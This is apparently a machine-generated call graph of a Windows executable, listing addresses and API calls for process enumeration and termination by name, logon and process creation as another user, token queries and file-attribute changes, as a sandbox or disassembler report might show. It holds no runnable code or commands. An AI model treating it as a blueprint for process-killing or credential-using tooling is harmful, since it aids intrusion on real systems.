7ff73afbb6f2 10795->10804 10796->10797 10797->10792 10797->10793 10799 7ff73afbb6d5 10798->10799 10800 7ff73afbb6f4 10799->10800 10801 7ff73afbb6dc 10799->10801 10802 7ff73afbb3e7 fputc 10800->10802 10803 7ff73afbb3e7 fputc 10801->10803 10801->10804 10802->10804 10803->10801 10804->10783 9835 7ff73afb702f 9836 7ff73afb7057 wcslen 9835->9836 9837 7ff73afb704b 9835->9837 9836->9837 11227 7ff73afb212f 11228 7ff73afb21b6 11227->11228 11229 7ff73afb2159 CreateToolhelp32Snapshot 11227->11229 11232 7ff73afb14e2 12 API calls 11228->11232 11230 7ff73afb2175 Process32First 11229->11230 11231 7ff73afb2227 GetLastError 11229->11231 11234 7ff73afb22ff GetLastError 11230->11234 11257 7ff73afb21a6 11230->11257 11233 7ff73afb14e2 12 API calls 11231->11233 11235 7ff73afb21df 11232->11235 11233->11235 11236 7ff73afb230c 11234->11236 11237 7ff73afb28a3 11235->11237 11238 7ff73afb21f4 11235->11238 11239 7ff73afb14e2 12 API calls 11236->11239 11249 7ff73afb14e2 12 API calls 11237->11249 11241 7ff73afb14e2 12 API calls 11238->11241 11239->11257 11240 7ff73afb2888 CloseHandle 11240->11235 11240->11237 11243 7ff73afb2211 11241->11243 11244 7ff73afb24d3 OpenProcess 11246 7ff73afb25a3 GetLastError 11244->11246 11247 7ff73afb24f4 TerminateProcess 11244->11247 11245 7ff73afb24c2 strcmp 11245->11244 11245->11257 11253 7ff73afb14e2 12 API calls 11246->11253 11251 7ff73afb2484 CloseHandle 11247->11251 11252 7ff73afb250a GetLastError 11247->11252 11248 7ff73afb26ed Process32Next 11250 7ff73afb2704 GetLastError 11248->11250 11248->11257 11249->11243 11250->11257 11251->11257 11254 7ff73afb14e2 12 API calls 11252->11254 11253->11257 11254->11257 11255 7ff73afb14e2 12 API calls 11255->11257 11256 7ff73afb254b 11257->11240 11257->11244 11257->11245 11257->11248 11257->11251 11257->11255 11257->11256 9838 7ff73afbdc2f 9839 7ff73afbdb86 9838->9839 9839->9838 9841 7ff73afbe2e0 9839->9841 9844 7ff73afbccd9 fputwc fwprintf 9839->9844 9845 7ff73afbcacd 9839->9845 9842 7ff73afbe301 9841->9842 9860 7ff73afbccd9 9841->9860 9844->9839 9846 7ff73afbcae7 9845->9846 9847 7ff73afbcafc 9846->9847 9849 7ff73afbcb4c 9846->9849 9848 7ff73afbcb27 fwprintf 9847->9848 9851 7ff73afbcb04 fwprintf 9847->9851 9852 7ff73afbcb39 9848->9852 9858 7ff73afbcb51 9849->9858 9871 7ff73afbca90 9849->9871 9851->9852 9852->9839 9853 7ff73afbcb8f strlen 9875 7ff73afc026c 9853->9875 9854 7ff73afbcbd9 9854->9852 9857 7ff73afbca90 fputwc 9854->9857 9857->9854 9858->9853 9858->9854 9859 7ff73afbca90 fputwc 9858->9859 9859->9858 9861 7ff73afbccf1 9860->9861 9862 7ff73afbcd06 9861->9862 9863 7ff73afbcd53 9861->9863 9864 7ff73afbcd31 9862->9864 9866 7ff73afbcd2a fwprintf 9862->9866 9865 7ff73afbcd58 9863->9865 9867 7ff73afbca90 fputwc 9863->9867 9864->9842 9868 7ff73afbcdab 9865->9868 9869 7ff73afbca90 fputwc 9865->9869 9866->9864 9867->9863 9868->9864 9870 7ff73afbca90 fputwc 9868->9870 9869->9865 9870->9868 9872 7ff73afbcaa1 9871->9872 9873 7ff73afbcabc 9872->9873 9874 7ff73afbcab2 fputwc 9872->9874 9873->9849 9874->9873 9876 7ff73afc0282 ___mb_cur_max_func ___lc_codepage_func 9875->9876 9877 7ff73afc027d 9875->9877 9878 7ff73afc02bb 9876->9878 9877->9876 9881 7ff73afc0150 9878->9881 9882 7ff73afc0170 9881->9882 9886 7ff73afc018c 9881->9886 9883 7ff73afc0254 9882->9883 9884 7ff73afc01df IsDBCSLeadByteEx 9882->9884 9882->9886 9888 7ff73afc01aa 9882->9888 9885 7ff73afc021f MultiByteToWideChar 9883->9885 9883->9886 9884->9883 9884->9888 9885->9886 9889 7ff73afc0244 _errno 9885->9889 9886->9858 9887 7ff73afc01c6 MultiByteToWideChar 9887->9886 9887->9889 9888->9886 9888->9887 9889->9886 9890 7ff73afbc436 9894 7ff73afbc382 9890->9894 9891 7ff73afbb593 strlen 9891->9894 9892 7ff73afbc475 wcslen 9892->9894 9893 7ff73afbb420 5 API calls 9893->9894 9894->9890 9894->9891 9894->9892 9894->9893 9895 7ff73afbca67 9894->9895 9896 7ff73afbb3e7 fputc 9894->9896 9896->9894 10805 7ff73afbde28 10806 7ff73afbde3e 10805->10806 10814 7ff73afbd126 10806->10814 10808 7ff73afbe2e0 10809 7ff73afbe301 10808->10809 10811 7ff73afbccd9 2 API calls 10808->10811 10810 7ff73afbdb86 10810->10808 10812 7ff73afbccd9 fputwc fwprintf 10810->10812 10813 7ff73afbcacd 10 API calls 10810->10813 10811->10809 10812->10810 10813->10810 10815 7ff73afbd137 10814->10815 10825 7ff73afbd00f 10815->10825 10818 7ff73afbd186 10833 7ff73afbcdd0 10818->10833 10819 7ff73afbd179 10829 7ff73afbcc00 10819->10829 10822 7ff73afbd191 10823 7ff73afbca90 fputwc 10822->10823 10824 7ff73afbd184 10822->10824 10823->10822 10824->10810 10826 7ff73afbd02d 10825->10826 10853 7ff73afbe4e0 10826->10853 10830 7ff73afbcc16 10829->10830 10831 7ff73afbcacd 10 API calls 10830->10831 10832 7ff73afbcc6c 10831->10832 10832->10824 10836 7ff73afbcdec 10833->10836 10834 7ff73afbce3d 10835 7ff73afbca90 fputwc 10834->10835 10841 7ff73afbceda 10834->10841 10835->10841 10836->10834 10837 7ff73afbca90 fputwc 10836->10837 10837->10836 10838 7ff73afbcee0 10839 7ff73afbcee9 10838->10839 10840 7ff73afbcf16 10838->10840 10843 7ff73afbca90 fputwc 10839->10843 10842 7ff73afbca90 fputwc 10840->10842 10845 7ff73afbcf6b 10840->10845 10850 7ff73afbccd9 2 API calls 10840->10850 10841->10838 10844 7ff73afbca90 fputwc 10841->10844 10842->10840 10843->10845 10844->10841 10851 7ff73afbcf7f 10845->10851 10985 7ff73afbcc72 10845->10985 10847 7ff73afbcf97 10848 7ff73afbcfbf 10847->10848 10852 7ff73afbca90 fputwc 10847->10852 10848->10822 10849 7ff73afbca90 fputwc 10849->10851 10850->10840 10851->10847 10851->10849 10852->10847 10854 7ff73afbe556 10853->10854 10855 7ff73afbe6b4 10854->10855 10871 7ff73afbd120 10854->10871 10917 7ff73afbf663 10854->10917 10928 7ff73afbe34c 10855->10928 10858 7ff73afbe6ac 10924 7ff73afbf717 10858->10924 10859 7ff73afbe5ee 10859->10858 10861 7ff73afbe6e0 10859->10861 10931 7ff73afbe320 10861->10931 10863 7ff73afbee37 10867 7ff73afbf803 6 API calls 10863->10867 10864 7ff73afbebc1 10873 7ff73afbf717 4 API calls 10864->10873 10877 7ff73afbeaae 10864->10877 10865 7ff73afbed9f 10865->10863 10887 7ff73afbee18 10865->10887 10938 7ff73afbf949 10865->10938 10870 7ff73afbee44 10867->10870 10868 7ff73afbf717 4 API calls 10868->10871 10875 7ff73afbf949 6 API calls 10870->10875 10882 7ff73afbee5c 10870->10882 10871->10818 10871->10819 10885 7ff73afbf3c7 10873->10885 10874 7ff73afbf949 6 API calls 10874->10863 10875->10882 10877->10868 10879 7ff73afbee0b 10884 7ff73afbf717 4 API calls 10879->10884 10880 7ff73afbf3de 10881 7ff73afbf717 4 API calls 10880->10881 10881->10877 10883 7ff73afbeee9 10882->10883 10957 7ff73afbfa57 10882->10957 10889 7ff73afbfa57 6 API calls 10883->10889 10893 7ff73afbef05 10883->10893 10884->10887 10885->10877 10885->10880 10888 7ff73afbf717 4 API calls 10885->10888 10887->10863 10887->10874 10888->10880 10889->10893 10890 7ff73afbef22 10891 7ff73afbefdb 10890->10891 10894 7ff73afbef6e 10890->10894 10892 7ff73afbefe6 10891->10892 10901 7ff73afbf2cd 10891->10901 10895 7ff73afbeff7 10892->10895 10898 7ff73afbfa57 6 API calls 10892->10898 10893->10890 10963 7ff73afbf763 10893->10963 10894->10864 10897 7ff73afbf763 6 API calls 10894->10897 10900 7ff73afbf663 6 API calls 10895->10900 10915 7ff73afbf030 10895->10915 10897->10864 10898->10895 10903 7ff73afbf00e 10900->10903 10902 7ff73afbf321 10901->10902 10905 7ff73afbf763 6 API calls 10901->10905 10902->10864 10907 7ff73afbfa57 6 API calls 10902->10907 10906 7ff73afbfa57 6 API calls 10903->10906 10904 7ff73afbf763 6 API calls 10904->10890 10905->10901 10906->10915 10907->10864 10909 7ff73afbf717 4 API calls 10909->10915 10910 7ff73afbf119 10911 7ff73afbf1b4 10910->10911 10914 7ff73afbf134 10910->10914 10911->10864 10912 7ff73afbfa57 6 API calls 10911->10912 10912->10864 10913 7ff73afbf763 6 API calls 10913->10915 10914->10864 10916 7ff73afbf763 6 API calls 10914->10916 10915->10864 10915->10902 10915->10909 10915->10910 10915->10913 10969 7ff73afbfb9a 10915->10969 10916->10914 10976 7ff73afbf560 10917->10976 10920 7ff73afbf6ec malloc 10921 7ff73afbf68b 10920->10921 10922 7ff73afbf706 10920->10922 10982 7ff73afbf605 10921->10982 10922->10859 10925 7ff73afbf724 10924->10925 10927 7ff73afbf73b 10924->10927 10926 7ff73afbf560 4 API calls 10925->10926 10926->10927 10927->10855 10929 7ff73afbe320 6 API calls 10928->10929 10930 7ff73afbe360 10929->10930 10930->10871 10932 7ff73afbe32c 10931->10932 10933 7ff73afbf663 6 API calls 10932->10933 10934 7ff73afbe340 10933->10934 10934->10864 10934->10865 10934->10877 10935 7ff73afbf803 10934->10935 10936 7ff73afbf663 6 API calls 10935->10936 10937 7ff73afbf814 10936->10937 10937->10865 10939 7ff73afbf973 10938->10939 10940 7ff73afbf95d 10938->10940 10941 7ff73afbedfd 10939->10941 10943 7ff73afbf560 4 API calls 10939->10943 10950 7ff73afbf9d6 10939->10950 10942 7ff73afbf763 6 API calls 10940->10942 10953 7ff73afbf829 10941->10953 10942->10939 10944 7ff73afbf99e 10943->10944 10945 7ff73afbf9b4 10944->10945 10946 7ff73afbf803 6 API calls 10944->10946 10945->10941 10948 7ff73afbf605 LeaveCriticalSection 10945->10948 10946->10945 10947 7ff73afbf560 4 API calls 10947->10950 10948->10950 10949 7ff73afbf717 4 API calls 10949->10950 10950->10941 10950->10947 10950->10949 10951 7ff73afbf829 6 API calls 10950->10951 10952 7ff73afbf605 LeaveCriticalSection 10950->10952 10951->10950 10952->10950 10954 7ff73afbf847 10953->10954 10955 7ff73afbf663 6 API calls 10954->10955 10956 7ff73afbf866 10955->10956 10956->10879 10956->10956 10958 7ff73afbfa80 10957->10958 10959 7ff73afbf663 6 API calls 10958->10959 10960 7ff73afbfa90 10959->10960 10961 7ff73afbfb42 10960->10961 10962 7ff73afbf717 4 API calls 10960->10962 10961->10883 10962->10961 10965 7ff73afbf77e 10963->10965 10964 7ff73afbef43 10964->10890 10964->10904 10965->10964 10966 7ff73afbf663 6 API calls 10965->10966 10967 7ff73afbf7b5 10966->10967 10967->10964 10968 7ff73afbf717 4 API calls 10967->10968 10968->10964 10970 7ff73afbfbaf 10969->10970 10971 7ff73afbfbd0 10970->10971 10972 7ff73afbfbb3 10970->10972 10974 7ff73afbf663 6 API calls 10971->10974 10973 7ff73afbf663 6 API calls 10972->10973 10975 7ff73afbfbba 10973->10975 10974->10975 10975->10915 10977 7ff73afbf573 EnterCriticalSection 10976->10977 10978 7ff73afbf591 10976->10978 10977->10978 10978->10977 10979 7ff73afbf5a4 InitializeCriticalSection InitializeCriticalSection 10978->10979 10980 7ff73afbf5ec Sleep 10978->10980 10981 7ff73afbf5fe 10978->10981 10979->10978 10980->10978 10981->10920 10981->10921 10983 7ff73afbf625 10982->10983 10984 7ff73afbf60e LeaveCriticalSection 10982->10984 10983->10922 10984->10983 10986 7ff73afbcc80 localeconv 10985->10986 10987 7ff73afbccae 10985->10987 10988 7ff73afc026c 6 API calls 10986->10988 10988->10987 9905 7ff73afbac27 9907 7ff73afbac4e 9905->9907 9906 7ff73afbac6f 9907->9906 9908 7ff73afbacdf signal 9907->9908 9909 7ff73afbacb5 9907->9909 9908->9906 9908->9909 9909->9906 9910 7ff73afbacfb signal 9909->9910 9910->9906 11265 7ff73afb292e 11266 7ff73afb2944 11265->11266 11267 7ff73afb2a53 11266->11267 11268 7ff73afb299e 11266->11268 11271 7ff73afb14e2 12 API calls 11267->11271 11269 7ff73afb2a87 11268->11269 11270 7ff73afb29a7 11268->11270 11274 7ff73afb14e2 12 API calls 11269->11274 11272 7ff73afb29bd strlen 11270->11272 11273 7ff73afb2abb 11270->11273 11280 7ff73afb29d5 11271->11280 11276 7ff73afb2aef strcat 11272->11276 11272->11280 11275 7ff73afb14e2 12 API calls 11273->11275 11274->11280 11275->11280 11277 7ff73afb2b08 strlen strlen 11276->11277 11278 7ff73afb2bec 11276->11278 11279 7ff73afb2b38 strlen strcat 11277->11279 11277->11280 11278->11280 11301 7ff73afb3032 11278->11301 11302 7ff73afb2c1a 11278->11302 11281 7ff73afb2b74 11279->11281 11282 7ff73afb2a3c 11280->11282 11289 7ff73afb14e2 12 API calls 11280->11289 11281->11278 11283 7ff73afb2b95 strlen strlen 11281->11283 11283->11278 11285 7ff73afb2bbc strlen strcat 11283->11285 11284 7ff73afb2c32 LogonUserA 11287 7ff73afb2c63 GetLastError 11284->11287 11288 7ff73afb2d9d CreateProcessAsUserA 11284->11288 11285->11281 11286 7ff73afb3041 CreateProcessA 11290 7ff73afb3191 11286->11290 11291 7ff73afb3098 GetLastError 11286->11291 11293 7ff73afb14e2 12 API calls 11287->11293 11294 7ff73afb2eed 11288->11294 11295 7ff73afb2dfc GetLastError 11288->11295 11289->11282 11292 7ff73afb14e2 12 API calls 11290->11292 11296 7ff73afb14e2 12 API calls 11291->11296 11292->11282 11293->11302 11298 7ff73afb14e2 12 API calls 11294->11298 11303 7ff73afb2ce5 11294->11303 11297 7ff73afb14e2 12 API calls 11295->11297 11296->11301 11297->11303 11298->11303 11299 7ff73afb2f27 CloseHandle 11300 7ff73afb2f2d 11299->11300 11300->11280 11304 7ff73afb2f36 11300->11304 11301->11280 11301->11286 11302->11284 11302->11303 11303->11299 11303->11300 11304->11282 11305 7ff73afb14e2 12 API calls 11304->11305 11305->11282 9918 7ff73afbe045 9923 7ff73afbdb86 9918->9923 9919 7ff73afbe2e0 9920 7ff73afbe301 9919->9920 9921 7ff73afbccd9 2 API calls 9919->9921 9921->9920 9922 7ff73afbccd9 fputwc fwprintf 9922->9923 9923->9919 9923->9922 9924 7ff73afbcacd 10 API calls 9923->9924 9924->9923 9925 7ff73afb5c44 9926 7ff73afb5cdf 9925->9926 9927 7ff73afb5c60 9925->9927 9929 7ff73afb14e2 12 API calls 9926->9929 9928 7ff73afb5c79 CreateFileA 9927->9928 9930 7ff73afb5d24 9927->9930 9931 7ff73afb5cb2 GetFileTime 9928->9931 9932 7ff73afb5ccc GetLastError 9928->9932 9937 7ff73afb5d1a 9929->9937 9935 7ff73afb14e2 12 API calls 9930->9935 9931->9932 9934 7ff73afb5d57 9931->9934 9933 7ff73afb5cd9 9932->9933 9932->9934 9933->9926 9933->9934 9936 7ff73afb5deb CloseHandle 9934->9936 9934->9937 9935->9937 9936->9937 11009 7ff73afba650 11010 7ff73afba659 11009->11010 11011 7ff73afba662 11010->11011 11013 7ff73afbaebd 11010->11013 11014 7ff73afbaecb 11013->11014 11015 7ff73afbaed3 11013->11015 11014->11015 11016 7ff73afbaee1 11014->11016 11017 7ff73afbaed1 11014->11017 11015->11011 11016->11015 11018 7ff73afbaeeb InitializeCriticalSection 11016->11018 11017->11015 11019 7ff73afbaf29 free 11017->11019 11020 7ff73afbaf37 DeleteCriticalSection 11017->11020 11018->11015 11019->11017 11020->11015 11021 7ff73afbae48 11022 7ff73afbaeb4 11021->11022 11023 7ff73afbae5a EnterCriticalSection 11021->11023 11025 7ff73afbae73 11023->11025 11024 7ff73afbaeab LeaveCriticalSection 11024->11022 11025->11024 11026 7ff73afbae98 free 11025->11026 11026->11024 11318 7ff73afb354e 11319 7ff73afb34db 11318->11319 11320 7ff73afb37ac 11319->11320 11321 7ff73afb14e2 12 API calls 11319->11321 11322 7ff73afb3505 11321->11322 11323 7ff73afbc562 11324 7ff73afbc566 11323->11324 11325 7ff73afbb9b0 fputc 11324->11325 11329 7ff73afbc382 11324->11329 11325->11329 11326 7ff73afbca67 11327 7ff73afbb3e7 fputc 11327->11329 11328 7ff73afbb593 strlen 11328->11329 11329->11326 11329->11327 11329->11328 11330 7ff73afbc475 wcslen 11329->11330 11331 7ff73afbb420 5 API calls 11329->11331 11330->11329 11331->11329 11332 7ff73afb6d60 11333 7ff73afb6d82 11332->11333 11334 7ff73afb6d6f 11332->11334 11337 7ff73afb14e2 12 API calls 11333->11337 11335 7ff73afb6db5 11334->11335 11336 7ff73afb6d74 11334->11336 11338 7ff73afb14e2 12 API calls 11335->11338 11339 7ff73afb14e2 12 API calls 11336->11339 11340 7ff73afb6d79 11336->11340 11337->11340 11338->11340 11339->11340 11341 7ff73afb1d60 11342 7ff73afb1e23 11341->11342 11343 7ff73afb1d77 11341->11343 11344 7ff73afb14e2 12 API calls 11342->11344 11345 7ff73afb1d80 OpenProcessToken 11343->11345 11346 7ff73afb1e53 11343->11346 11365 7ff73afb1e21 11344->11365 11348 7ff73afb1eb8 GetLastError 11345->11348 11349 7ff73afb1d98 GetTokenInformation 11345->11349 11347 7ff73afb14e2 12 API calls 11346->11347 11347->11365 11352 7ff73afb14e2 12 API calls 11348->11352 11350 7ff73afb1dce GetLastError 11349->11350 11351 7ff73afb1fcd 11349->11351 11354 7ff73afb1de0 11350->11354 11355 7ff73afb1f67 LocalAlloc 11350->11355 11353 7ff73afb2090 LocalAlloc 11351->11353 11357 7ff73afb20cb 11351->11357 11352->11365 11353->11357 11358 7ff73afb20a8 GetLengthSid memcpy 11353->11358 11359 7ff73afb14e2 12 API calls 11354->11359 11355->11357 11360 7ff73afb1f82 GetTokenInformation 11355->11360 11356 7ff73afb14e2 12 API calls 11362 7ff73afb1ead 11356->11362 11358->11357 11363 7ff73afb1df6 11359->11363 11360->11353 11361 7ff73afb1fac GetLastError 11360->11361 11364 7ff73afb14e2 12 API calls 11361->11364 11366 7ff73afb1e05 LocalFree 11363->11366 11367 7ff73afb1e0e CloseHandle 11363->11367 11364->11351 11365->11356 11366->11367 11367->11362 11367->11365 9952 7ff73afb3c63 9953 7ff73afb3cec 9952->9953 9954 7ff73afb3d7d 9953->9954 9957 7ff73afb3d02 9953->9957 9955 7ff73afb14e2 12 API calls 9954->9955 9956 7ff73afb3d30 9955->9956 9958 7ff73afb14e2 12 API calls 9957->9958 9958->9956 9959 7ff73afb2463 9960 7ff73afb2484 CloseHandle 9959->9960 9980 7ff73afb23f0 9960->9980 9961 7ff73afb26ed Process32Next 9962 7ff73afb2704 GetLastError 9961->9962 9961->9980 9962->9980 9963 7ff73afb2888 CloseHandle 9966 7ff73afb28a3 9963->9966 9967 7ff73afb21e4 9963->9967 9965 7ff73afb14e2 12 API calls 9965->9980 9974 7ff73afb14e2 12 API calls 9966->9974 9967->9966 9969 7ff73afb21f4 9967->9969 9968 7ff73afb24d3 OpenProcess 9972 7ff73afb25a3 GetLastError 9968->9972 9973 7ff73afb24f4 TerminateProcess 9968->9973 9971 7ff73afb14e2 12 API calls 9969->9971 9970 7ff73afb24c2 strcmp 9970->9968 9970->9980 9975 7ff73afb2211 9971->9975 9977 7ff73afb14e2 12 API calls 9972->9977 9973->9960 9976 7ff73afb250a GetLastError 9973->9976 9974->9975 9978 7ff73afb14e2 12 API calls 9976->9978 9977->9980 9978->9980 9979 7ff73afb254b 9980->9960 9980->9961 9980->9963 9980->9965 9980->9968 9980->9970 9980->9979 10416 7ff73afb3b64 10417 7ff73afb3bc1 10416->10417 10418 7ff73afb3b8a 10416->10418 10421 7ff73afb14e2 12 API calls 10417->10421 10419 7ff73afb3b8f 10418->10419 10420 7ff73afb3bec 10418->10420 10435 7ff73afb3909 10419->10435 10422 7ff73afb14e2 12 API calls 10420->10422 10426 7ff73afb3bb9 10421->10426 10422->10426 10425 7ff73afb3ba2 SetFileAttributesA 10425->10426 10427 7ff73afb3c3e GetLastError 10425->10427 10426->10427 10429 7ff73afb3c6a 10426->10429 10428 7ff73afb14e2 12 API calls 10427->10428 10428->10426 10430 7ff73afb3d02 10429->10430 10431 7ff73afb3d7d 10429->10431 10434 7ff73afb14e2 12 API calls 10430->10434 10432 7ff73afb14e2 12 API calls 10431->10432 10433 7ff73afb3d30 10432->10433 10434->10433 10436 7ff73afb3921 10435->10436 10437 7ff73afb3998 10435->10437 10439 7ff73afb39d1 10436->10439 10440 7ff73afb392a GetFileAttributesA 10436->10440 10438 7ff73afb14e2 12 API calls 10437->10438 10445 7ff73afb393b 10438->10445 10441 7ff73afb14e2 12 API calls 10439->10441 10442 7ff73afb3a0a GetLastError 10440->10442 10440->10445 10441->10445 10443 7ff73afb14e2 12 API calls 10442->10443 10443->10445 10444 7ff73afb3b3a 10446 7ff73afb14e2 12 API calls 10444->10446 10445->10444 10447 7ff73afb3974 10445->10447 10448 7ff73afb3b5f 10446->10448 10449 7ff73afb14e2 12 API calls 10447->10449 10448->10448 10450 7ff73afb398a 10449->10450 10450->10425 10450->10426 11027 7ff73afbde59 11028 7ff73afbde6f 11027->11028 11036 7ff73afbd9bb 11028->11036 11030 7ff73afbe2e0 11032 7ff73afbe301 11030->11032 11033 7ff73afbccd9 2 API calls 11030->11033 11031 7ff73afbdb86 11031->11030 11034 7ff73afbcacd 10 API calls 11031->11034 11035 7ff73afbccd9 fputwc fwprintf 11031->11035 11033->11032 11034->11031 11035->11031 11037 7ff73afbd9cd 11036->11037 11038 7ff73afbd00f 6 API calls 11037->11038 11039 7ff73afbda05 11038->11039 11040 7ff73afbda1a 11039->11040 11041 7ff73afbda2c 11039->11041 11042 7ff73afbcc00 10 API calls 11040->11042 11043 7ff73afbda9d 11041->11043 11046 7ff73afbda42 11041->11046 11051 7ff73afbda27 11042->11051 11044 7ff73afbdaa1 11043->11044 11045 7ff73afbdaa8 strlen 11043->11045 11054 7ff73afbd897 11044->11054 11045->11044 11047 7ff73afbda46 11046->11047 11048 7ff73afbda4e strlen 11046->11048 11050 7ff73afbcdd0 9 API calls 11047->11050 11048->11047 11052 7ff73afbda81 11050->11052 11051->11031 11052->11051 11053 7ff73afbca90 fputwc 11052->11053 11053->11052 11055 7ff73afbd8b9 11054->11055 11056 7ff73afbcdd0 9 API calls 11055->11056 11057 7ff73afbd904 11056->11057 11058 7ff73afbca90 fputwc 11057->11058 11059 7ff73afbd925 11058->11059 11368 7ff73afbc958 11369 7ff73afbc960 localeconv 11368->11369 11375 7ff73afbc382 11368->11375 11370 7ff73afc026c 6 API calls 11369->11370 11370->11375 11371 7ff73afbca67 11372 7ff73afbb3e7 fputc 11372->11375 11373 7ff73afbb593 strlen 11373->11375 11374 7ff73afbc475 wcslen 11374->11375 11375->11371 11375->11372 11375->11373 11375->11374 11376 7ff73afbb420 5 API calls 11375->11376 11376->11375 10451 7ff73afb475d 10452 7ff73afb4b28 10451->10452 10453 7ff73afb4b35 10452->10453 10454 7ff73afb4b2d fclose 10452->10454 10455 7ff73afb4ba2 10453->10455 10456 7ff73afb4b39 10453->10456 10454->10453 10457 7ff73afb14e2 12 API calls 10455->10457 10459 7ff73afb14e2 12 API calls 10456->10459 10458 7ff73afb4b78 10457->10458 10459->10458 11399 7ff73afbdd5c 11400 7ff73afbdd6e 11399->11400 11401 7ff73afbd3c1 fputwc 11400->11401 11406 7ff73afbdb86 11401->11406 11402 7ff73afbe2e0 11403 7ff73afbe301 11402->11403 11404 7ff73afbccd9 2 API calls 11402->11404 11404->11403 11405 7ff73afbccd9 fputwc fwprintf 11405->11406 11406->11402 11406->11405 11407 7ff73afbcacd 10 API calls 11406->11407 11407->11406 9981 7ff73afb385c 9982 7ff73afb3869 9981->9982 9989 7ff73afb38a9 9981->9989 9984 7ff73afb1cf4 14 API calls 9982->9984 9983 7ff73afb14e2 12 API calls 9986 7ff73afb38ce 9983->9986 9985 7ff73afb3875 9984->9985 9985->9986 9987 7ff73afb1c73 14 API calls 9985->9987 9988 7ff73afb3889 9987->9988 9988->9986 9988->9989 9990 7ff73afb38d8 GetLastError 9988->9990 9989->9983 9991 7ff73afb14e2 12 API calls 9990->9991 9991->9986 10014 7ff73afba072 10015 7ff73afba0b6 10014->10015 10016 7ff73afba08c 10014->10016 10017 7ff73afb14e2 12 API calls 10015->10017 10020 7ff73afb9f70 10016->10020 10019 7ff73afba0a3 10017->10019 10021 7ff73afb9fd7 10020->10021 10022 7ff73afb9f9b 10020->10022 10024 7ff73afb14e2 12 API calls 10021->10024 10023 7ff73afb9ed0 14 API calls 10022->10023 10025 7ff73afb9fae 10023->10025 10026 7ff73afb9fb4 10024->10026 10025->10026 10027 7ff73afba007 _errno 10025->10027 10026->10019 10028 7ff73afc0560 10027->10028 10029 7ff73afba029 _errno 10028->10029 10029->10026 10030 7ff73afba034 _errno 10029->10030 10031 7ff73afb14e2 12 API calls 10030->10031 10031->10026 11408 7ff73afb2d71 11409 7ff73afb2f1c 11408->11409 11410 7ff73afb2f27 CloseHandle 11409->11410 11411 7ff73afb2f2d 11409->11411 11410->11411 11412 7ff73afb29db 11411->11412 11413 7ff73afb2f36 11411->11413 11415 7ff73afb2a3c 11412->11415 11416 7ff73afb14e2 12 API calls 11412->11416 11414 7ff73afb14e2 12 API calls 11413->11414 11413->11415 11414->11415 11416->11415 10041 7ff73afbdc75 10042 7ff73afbdc8a 10041->10042 10043 7ff73afbdccd 10041->10043 10045 7ff73afbdcb4 wcslen 10042->10045 10050 7ff73afbdb86 10042->10050 10052 7ff73afbcfc8 10043->10052 10045->10050 10046 7ff73afbe2e0 10047 7ff73afbe301 10046->10047 10048 7ff73afbccd9 2 API calls 10046->10048 10048->10047 10049 7ff73afbccd9 fputwc fwprintf 10049->10050 10050->10046 10050->10049 10051 7ff73afbcacd 10 API calls 10050->10051 10051->10050 10053 7ff73afbcfd8 10052->10053 10054 7ff73afbcff6 strlen 10053->10054 10055 7ff73afbcfef 10053->10055 10054->10055 10469 7ff73afb6776 10470 7ff73afb67fb 10469->10470 10471 7ff73afb678c 10469->10471 10474 7ff73afb14e2 12 API calls 10470->10474 10472 7ff73afb6795 10471->10472 10473 7ff73afb682e 10471->10473 10476 7ff73afb685e 10472->10476 10477 7ff73afb679e 10472->10477 10475 7ff73afb14e2 12 API calls 10473->10475 10492 7ff73afb6824 10474->10492 10475->10492 10478 7ff73afb14e2 12 API calls 10476->10478 10479 7ff73afb67aa ExpandEnvironmentStringsA 10477->10479 10480 7ff73afb688e 10477->10480 10478->10492 10482 7ff73afb6909 GetLastError 10479->10482 10483 7ff73afb67bb 10479->10483 10481 7ff73afb14e2 12 API calls 10480->10481 10481->10492 10485 7ff73afb14e2 12 API calls 10482->10485 10486 7ff73afb67c9 10483->10486 10487 7ff73afb69dc 10483->10487 10484 7ff73afb6a51 10485->10492 10490 7ff73afb14e2 12 API calls 10486->10490 10489 7ff73afb14e2 12 API calls 10487->10489 10488 7ff73afb14e2 12 API calls 10491 7ff73afb67f1 10488->10491 10489->10492 10490->10491 10492->10484 10492->10488 10056 7ff73afb4c69 10057 7ff73afb4be8 10056->10057 10058 7ff73afb4d5a 10057->10058 10060 7ff73afb4c0a 10057->10060 10059 7ff73afb14e2 12 API calls 10058->10059 10061 7ff73afb4d7c 10059->10061 10062 7ff73afb14e2 12 API calls 10060->10062 10061->10061 10063 7ff73afb4c20 10062->10063 10493 7ff73afba369 10494 7ff73afba378 10493->10494 10495 7ff73afba3a7 10493->10495 10499 7ff73afba264 10494->10499 10497 7ff73afb14e2 12 API calls 10495->10497 10498 7ff73afba390 10497->10498 10500 7ff73afba286 10499->10500 10501 7ff73afba2c9 10499->10501 10503 7ff73afb9ed0 14 API calls 10500->10503 10502 7ff73afb14e2 12 API calls 10501->10502 10505 7ff73afba29f 10502->10505 10504 7ff73afba299 10503->10504 10504->10505 10506 7ff73afba2f9 _errno _strtoui64 _errno 10504->10506 10505->10498 10506->10505 10507 7ff73afba32c _errno 10506->10507 10508 7ff73afb14e2 12 API calls 10507->10508 10508->10505 11060 7ff73afba66c 11061 7ff73afba67e 11060->11061 11062 7ff73afbaebd 3 API calls 11061->11062 11063 7ff73afba693 11061->11063 11062->11063 10518 7ff73afc0781 BuildTrusteeWithSidW 11417 7ff73afb9181 11425 7ff73afb8e2e 11417->11425 11418 7ff73afb90f2 GetProcessHeap HeapFree 11418->11425 11419 7ff73afb8da0 11420 7ff73afb9284 11419->11420 11421 7ff73afb8da9 FreeLibrary 11419->11421 11421->11420 11422 7ff73afba1f1 17 API calls 11422->11425 11423 7ff73afb8ecc strlen 11423->11425 11424 7ff73afb8f64 GetProcessHeap HeapAlloc 11424->11425 11425->11418 11425->11419 11425->11422 11425->11423 11425->11424 11426 7ff73afb8fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 11425->11426 11427 7ff73afb14e2 12 API calls 11425->11427 11428 7ff73afb795a 20 API calls 11425->11428 11429 7ff73afb91dc LocalFree 11425->11429 11426->11425 11427->11425 11428->11425 11429->11425 10143 7ff73afbac96 10144 7ff73afbad13 signal 10143->10144 10146 7ff73afbaca1 10143->10146 10145 7ff73afbad25 signal 10144->10145 10144->10146 10145->10146 10147 7ff73afb7096 10148 7ff73afb70b2 strlen 10147->10148 10149 7ff73afb70c7 10147->10149 10148->10149 11085 7ff73afbde8a 11088 7ff73afbdea6 11085->11088 11086 7ff73afbcc00 10 API calls 11095 7ff73afbdb86 11086->11095 11087 7ff73afbdf1c 11087->11086 